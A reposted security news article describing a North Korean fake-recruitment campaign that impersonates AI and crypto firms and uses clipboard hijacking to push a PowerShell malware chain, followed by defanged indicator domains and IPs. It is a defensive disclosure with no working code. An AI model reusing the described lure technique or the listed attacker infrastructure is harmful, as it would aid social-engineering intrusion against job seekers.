By rssfeeds-admin 
The campaign targets AI developers, cryptocurrency professionals, and software engineers through a polished fake recruitment platform that convincingly mimics legitimate hiring systems.
Researchers at Validin discovered the operation while monitoring suspicious domains using a YARA-based detection pipeline.
The malicious job board, hosted on lenvny[.]com presents itself as “Lenvny – an Integrated AI‑Powered Interview Tool,” complete with fabricated testimonials, brand logos, and dynamic job listings.
The site closely imitates the legitimate Lever talent acquisition platform, giving it a compelling appearance.
A Sophisticated Fake Recruitment Workflow
Unlike earlier DPRK lures that used static phishing pages, the new campaign employs a fully functional React and Next.js job portal with dozens of dynamically generated listings and a user experience that resembles real hiring systems.
Job openings impersonate major technology firms such as Anthropic, Anchorage Digital, and Yuga Labs brands with known appeal among AI and crypto professionals.
The application workflow collects personal and professional details, including name, contact information, LinkedIn and GitHub profiles, and uploaded résumés. Even without malware execution, this data helps North Korean operators build detailed dossiers on high‑value technical talent.
The infection begins during a staged “video introduction” phase. Applicants are prompted to record short videos, but when they attempt to fix a supposed webcam issue, the platform delivers a malicious command through clipboard hijacking.
The attacker‑controlled script silently replaces copied text with a multi‑stage infection chain when pasted into PowerShell or a terminal. The Windows‑specific command downloads a fake “graphics driver update” followed by a ZIP archive containing a VBScript loader.
PowerShell then extracts and executes the contents, leading to the deployment of secondary payloads consistent with previous BeaverTail and InvisibleFerret malware families used in DPRK campaigns.
Targeting High‑Value AI and Crypto Engineers
The campaign’s focus on AI researchers and cryptocurrency developers aligns with North Korea’s strategic goals of acquiring research assets, technical knowledge, and direct financial gain.
AI professionals often handle models, datasets, and proprietary code, while crypto engineers may have indirect access to wallets or key‑management systems.
By staging attacks around familiar recruitment workflows, the threat actors lower suspicion and exploit normal candidate behavior, such as copying technical commands or downloading helper utilities.
Experts warn job seekers to verify all job portals and never execute recruiter‑provided scripts without validation. Legitimate organizations rarely host interview tools on unrelated domains. Running interview‑related code inside isolated environments can prevent compromise.
The Contagious Interview campaign continues to evolve, showing how DPRK operators are advancing beyond simple phishing toward genuine social engineering ecosystems that blend technical precision with psychological manipulation.
Indicators
Related domains and IPs
lenvny[.]com
advisorflux[.]com
assureeval[.]com
carrerlilla[.]com
69.62.86.78
72.61.9.45Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post North Korean Impersonation Job Platform Poses Risks to U.S. AI Developers appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.